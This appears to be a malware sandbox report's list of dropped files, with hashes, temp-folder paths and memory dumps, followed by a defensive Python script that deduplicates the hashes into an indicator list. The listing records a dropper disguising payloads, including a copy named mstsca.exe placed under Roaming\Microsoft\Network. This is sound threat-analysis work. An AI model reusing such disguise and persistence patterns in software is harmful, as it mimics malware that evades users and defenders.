C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 1aa31a69c809b61505813ebcb6486efa
SHA1 77e08b93154d5d49ad845ced0ab9ab8a397ae106
SHA256 ce076279c960afa7f3d9f645567b09dc23f77a5bb45424dc77a90c19dcbb82a4
SHA512 6702e6c51995bb5884d7c0f3ab5363c2b4b1fae852dba0b9d181ae5bf925ef78020dc9904380e581d6fcb7e805c2749b83d4d8da33df457f2ff607c6e25e7cd8

memory/4864-230-0x00007FF643250000-0x00007FF6432E7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\fed1e4b1-7e96-4a63-9aa8-04eed357422f\FE17.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/4508-223-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4508-237-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4876-240-0x0000000000B50000-0x0000000000C84000-memory.dmp

memory/2312-241-0x0000000072FD0000-0x00000000736BE000-memory.dmp

memory/4876-242-0x0000000000F30000-0x000000000102B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

memory/4508-244-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FE17.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

memory/5040-252-0x000000000CF70000-0x000000000CFE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/3220-256-0x00000000033C0000-0x00000000033D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/3808-264-0x0000000000400000-0x00000000004BB000-memory.dmp

memory/368-259-0x0000000007C60000-0x0000000007CC6000-memory.dmp

memory/368-255-0x0000000007BC0000-0x0000000007C52000-memory.dmp

memory/4876-267-0x0000000004490000-0x0000000004571000-memory.dmp

memory/368-271-0x0000000006A00000-0x0000000006A10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3942.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/4212-280-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FE17.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

memory/3892-281-0x0000000004007000-0x0000000004099000-memory.dmp

memory/4212-282-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4212-283-0x0000000000400000-0x0000000000537000-memory.dmp

memory/368-284-0x0000000002590000-0x0000000002690000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/368-286-0x0000000006A00000-0x0000000006A10000-memory.dmp

memory/5040-291-0x00000000027B0000-0x00000000028B0000-memory.dmp

memory/5040-294-0x00000000048A0000-0x00000000048B0000-memory.dmp

memory/5040-304-0x00000000048A0000-0x00000000048B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4C21.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/4864-307-0x0000000003620000-0x0000000003751000-memory.dmp

memory/3220-308-0x0000000003160000-0x0000000003170000-memory.dmp

memory/5040-300-0x00000000048A0000-0x00000000048B0000-memory.dmp

memory/3220-313-0x0000000003160000-0x0000000003170000-memory.dmp

memory/368-312-0x0000000072FD0000-0x00000000736BE000-memory.dmp

memory/3220-303-0x0000000001340000-0x0000000001350000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4C21.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/5040-296-0x00000000048A0000-0x00000000048B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/368-285-0x0000000006A00000-0x0000000006A10000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 debbf14f3483068c85dbb41089275387
SHA1 53c67f0496489a8bf83e645035b9e030fe22f052
SHA256 d62934313eec30d6276854f81ed0ad0fa455c13032f23c49dc5e931e53aa24fd
SHA512 ef0f3231d777612c12fa32f6d9fd8c24f3147ab0d44e660ceb86d6cd43120be1396ae351d14305ad41d10799cb1fba9ae7626e6970ec840f4e30b4934a49971d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 49353d9754bed0cb6fc6101bff12aa2a
SHA1 d2e7b27de35840041aa59f97a178c16b76c89f8b
SHA256 37e0653a22c3ba4fe6a0df6bb37503b6053760106c802a2619f1f2ab1a5128cb
SHA512 5c787af42cda676cfec90eb518f33e743b509e4f4cb52c3e1ca9f9d2452d4bc3820e94e6310db772899ab85af849400ef54c90c4298cb2f37355e00efaa1d556

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 c01fcb0db5aded4a825c1d7f97a35e1a
SHA1 5a75b3fbfd39566b06363f68a98ea146941f262d
SHA256 ada788b4cbd81874fb4feaac47fb8d0a31871fde641e9dcd45ee615204f21b46
SHA512 88e01d9238db41d9d6bdebe56f43a3c7167c3765e3d00945660ab9b3cb0277337271117ece43d491dfc86dc99afcb0caae80148d9143c95b55483b27c86a67f9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

MD5 743cf0693a4f37366d13f300e5499846
SHA1 1637612b467a07aff431063dbf28c1c913db7722
SHA256 8d6c43c5cf8ebb46c91294b3a2322b7966a1740604b4e109a80f3f640fc7777f
SHA512 46f81e36235ede8b146df44584398902e4bd04384a04383f43a40055755c4aa047f89213968147b3ed6a522ae9ff5fa63cd1c6025795ee8b1df79a916af71bf6

memory/4104-323-0x0000000000400000-0x0000000000537000-memory.dmp

memory/5040-320-0x0000000072FD0000-0x00000000736BE000-memory.dmp

memory/3220-319-0x0000000003160000-0x0000000003170000-memory.dmp

memory/3220-322-0x0000000003160000-0x0000000003170000-memory.dmp

memory/4864-321-0x00000000034B0000-0x0000000003620000-memory.dmp

memory/3220-325-0x0000000001340000-0x0000000001350000-memory.dmp

memory/3220-326-0x0000000003160000-0x0000000003170000-memory.dmp

memory/3220-332-0x0000000003160000-0x0000000003170000-memory.dmp

memory/3460-334-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3712-339-0x0000000004153000-0x00000000041E5000-memory.dmp

memory/3220-347-0x0000000003160000-0x0000000003170000-memory.dmp

memory/3220-350-0x0000000003160000-0x0000000003170000-memory.dmp

memory/4400-354-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1752-357-0x0000000002746000-0x00000000027D7000-memory.dmp

memory/1908-362-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3420-364-0x0000000004063000-0x00000000040F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4C21.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/3220-359-0x0000000003160000-0x0000000003170000-memory.dmp

memory/4400-358-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3220-355-0x0000000003160000-0x0000000003170000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/3220-352-0x0000000003160000-0x0000000003170000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5A1D.exe

MD5 d1c4c493c171000d21ae122bc5d819ba
SHA1 e469267b65d3aacb2fe5074fd2a54485fab00ef0
SHA256 76ae20cea89aac265c5403e1cd0e7baab8f205eaed7a48f199f86b4009d57df5
SHA512 c754970b9f506e8067eab9ec89ae56328a46333e87d97b13b88de1097cc6bdfd3aee60c7efa65643a2d5d77b70b397d5222395e3268eda70d9ae5cfb12be012e

memory/3220-343-0x0000000003160000-0x0000000003170000-memory.dmp

memory/4104-338-0x0000000000400000-0x0000000000537000-memory.dmp

memory/5040-337-0x0000000004490000-0x00000000044E0000-memory.dmp

memory/1008-336-0x0000000004220000-0x000000000433B000-memory.dmp

memory/3460-330-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4104-329-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3942.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/1008-333-0x000000000418A000-0x000000000421B000-memory.dmp

memory/68-331-0x00007FF64DE80000-0x00007FF64E23D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

C:\Users\Admin\AppData\Local\151c072c-a790-4b59-a92a-35c783e9855c\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

C:\Users\Admin\AppData\Local\Temp\9561.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

C:\Users\Admin\AppData\Roaming\bhidbtj

MD5 c9de9148f899b175350adb5cd3d077e5
SHA1 9de7bf5a1f2bed9a48e505e88efdd164453afc44
SHA256 c792eb7144a343e7d3b9036a0df4381353c265e5574522687b2df0be2685fc6e
SHA512 ce786835569989c36820217cd4594f02d0aa9cb2602587dc5da3b38fa8cfda24b98930b635f777bfa8219e46f44a243a056c0b758ab90d748a7b75464e76ed43

C:\Users\Admin\AppData\Local\Temp\9802.dll

MD5 7292b17c8fa8000b5d7c36279669f96e
SHA1 ca0d9ce9d737bde5a2e1a1639cd9e3762f7c9a1b
SHA256 b2f3ad76def35672309bb9ef2f951b58d37d5010327cbe70b89d756c01d22fc2
SHA512 37d0f05b96b2c837b5cdbe98b160a2168c2d2da2c470f60ab749c4a3fed236c08e47e8ced9a5e799a980ccfa9e362b3d343e28fd36db26ee99dcb8e8f7bbd5e1

C:\Users\Admin\AppData\Local\Temp\4C21.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

C:\Users\Admin\AppData\Local\Temp\4A7B.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

C:\Users\Admin\AppData\Local\151c072c-a790-4b59-a92a-35c783e9855c\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\Temp\67E6.exe

MD5 d1c4c493c171000d21ae122bc5d819ba
SHA1 e469267b65d3aacb2fe5074fd2a54485fab00ef0
SHA256 76ae20cea89aac265c5403e1cd0e7baab8f205eaed7a48f199f86b4009d57df5
SHA512 c754970b9f506e8067eab9ec89ae56328a46333e87d97b13b88de1097cc6bdfd3aee60c7efa65643a2d5d77b70b397d5222395e3268eda70d9ae5cfb12be012e

C:\Users\Admin\AppData\Local\151c072c-a790-4b59-a92a-35c783e9855c\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\Temp\67E6.exe

MD5 d1c4c493c171000d21ae122bc5d819ba
SHA1 e469267b65d3aacb2fe5074fd2a54485fab00ef0
SHA256 76ae20cea89aac265c5403e1cd0e7baab8f205eaed7a48f199f86b4009d57df5
SHA512 c754970b9f506e8067eab9ec89ae56328a46333e87d97b13b88de1097cc6bdfd3aee60c7efa65643a2d5d77b70b397d5222395e3268eda70d9ae5cfb12be012e

C:\Users\Admin\AppData\Local\Temp\3942.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

\Users\Admin\AppData\Local\Temp\9802.dll

MD5 7292b17c8fa8000b5d7c36279669f96e
SHA1 ca0d9ce9d737bde5a2e1a1639cd9e3762f7c9a1b
SHA256 b2f3ad76def35672309bb9ef2f951b58d37d5010327cbe70b89d756c01d22fc2
SHA512 37d0f05b96b2c837b5cdbe98b160a2168c2d2da2c470f60ab749c4a3fed236c08e47e8ced9a5e799a980ccfa9e362b3d343e28fd36db26ee99dcb8e8f7bbd5e1

C:\Users\Admin\AppData\Local\Temp\89E6.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

C:\Users\Admin\AppData\Local\Temp\9561.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

C:\Users\Admin\AppData\Local\0b308a45-a6ef-46f9-9fa5-5e523635e756\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd
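Added example, not part of the sandbox report. Read as a flat list, the Files section above hides two facts a responder wants up front: the same payload is dropped under several names (FE17.exe, 3942.exe and 9561.exe share one SHA256; oldplayer.exe and oneetx.exe share another; build3.exe is re-dropped as mstsca.exe under Roaming\Microsoft\Network), and the same image range 0x400000-0x537000 is dumped from several PIDs. The Python below parses an excerpt of this listing, collapses repeated records, groups paths by SHA256, checks that each SHA256 is paired with a single MD5/SHA1 (a mismatch would mean a mangled report), and lists image ranges dumped from more than one process. The excerpt is constructed from the report's own paths and hashes with SHA1/SHA512 lines trimmed; the parsing rules are my own and assume the layout seen here (a path line followed by `MD5`/`SHA1`/`SHA256`/`SHA512` lines, and `memory/<pid>-<index>-<start>-<end>-memory.dmp` names, where treating the second number as an index is an assumption).

```python
import re
from collections import defaultdict

# Constructed excerpt of the report's Files listing: paths, hashes and memory
# dump names are copied from the report; SHA1/SHA512 lines are trimmed from
# most entries and blank separators dropped to keep the sample short.
REPORT_EXCERPT = r"""
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
memory/4508-223-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
MD5 a64a886a695ed5fb9273e73241fec2f7
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
C:\Users\Admin\AppData\Local\Temp\FE17.exe
MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
C:\Users\Admin\AppData\Local\Temp\3942.exe
MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
C:\Users\Admin\AppData\Local\Temp\3942.exe
MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
memory/4212-280-0x0000000000400000-0x0000000000537000-memory.dmp
memory/368-271-0x0000000006A00000-0x0000000006A10000-memory.dmp
C:\Users\Admin\AppData\Local\151c072c-a790-4b59-a92a-35c783e9855c\build3.exe
MD5 9ead10c08e72ae41921191f8db39bc16
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
MD5 9ead10c08e72ae41921191f8db39bc16
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
memory/3808-264-0x0000000000400000-0x00000000004BB000-memory.dmp
memory/4104-323-0x0000000000400000-0x0000000000537000-memory.dmp
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
PATH_RE = re.compile(r"^(?:[A-Za-z]:\\|\\Users\\)")  # "C:\..." or the bare "\Users\..." form
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


def parse_files_section(text):
    """Split the flattened listing into file records ({'path', 'MD5', ...}) and
    memory-dump tuples (pid, index, start, end). Blank lines are ignored; a hash
    line attaches to the most recent path line."""
    files, mem, cur = [], [], None
    for line in (ln.strip() for ln in text.splitlines()):
        m = MEM_RE.match(line)
        if m:
            pid, idx, start, end = m.groups()
            mem.append((int(pid), int(idx), int(start, 16), int(end, 16)))
            cur = None
        elif PATH_RE.match(line):
            cur = {"path": line}
            files.append(cur)
        elif (h := HASH_RE.match(line)) and cur is not None:
            cur[h.group(1)] = h.group(2)
    return files, mem


def group_by_sha256(files):
    """SHA256 -> sorted distinct paths. Repeated records collapse, and one
    payload dropped under several random-hex names becomes one key."""
    groups = defaultdict(set)
    for rec in files:
        if "SHA256" in rec:
            groups[rec["SHA256"]].add(rec["path"])
    return {sha: sorted(paths) for sha, paths in groups.items()}


def hash_conflicts(files):
    """SHA256 values paired with more than one MD5/SHA1/SHA512 across records.
    All hashes describe one file, so any hit means the report text is mangled."""
    seen = defaultdict(lambda: defaultdict(set))
    for rec in files:
        for algo in ("MD5", "SHA1", "SHA512"):
            if "SHA256" in rec and algo in rec:
                seen[rec["SHA256"]][algo].add(rec[algo])
    return sorted(sha for sha, per_algo in seen.items()
                  if any(len(vals) > 1 for vals in per_algo.values()))


def shared_image_ranges(mem):
    """(start, end) -> sorted PIDs, keeping only ranges dumped from more than
    one process: the same image at the same address in several PIDs is the
    usual footprint of one binary executed or injected repeatedly."""
    by_range = defaultdict(set)
    for pid, _idx, start, end in mem:
        by_range[(start, end)].add(pid)
    return {rng: sorted(pids) for rng, pids in by_range.items() if len(pids) > 1}


def unique_iocs(files):
    """Deduplicated (sha256, [file names]) pairs, sorted by hash, for an IOC list."""
    return [(sha, [p.rsplit("\\", 1)[-1] for p in paths])
            for sha, paths in sorted(group_by_sha256(files).items())]


if __name__ == "__main__":
    files, mem = parse_files_section(REPORT_EXCERPT)
    for sha, names in unique_iocs(files):
        print(sha, ",".join(names))
    print("hash conflicts:", hash_conflicts(files) or "none")
    for (start, end), pids in shared_image_ranges(mem).items():
        print(f"0x{start:X}-0x{end:X} dumped from PIDs {pids}")
```

On this excerpt the seven file records reduce to three unique hashes, and the only image range shared across processes is 0x400000-0x537000 (PIDs 4104, 4212, 4508), which is exactly the pattern visible in the full listing above. Feeding the whole Files section through `parse_files_section` instead of the excerpt gives the complete deduplicated IOC set for this sample.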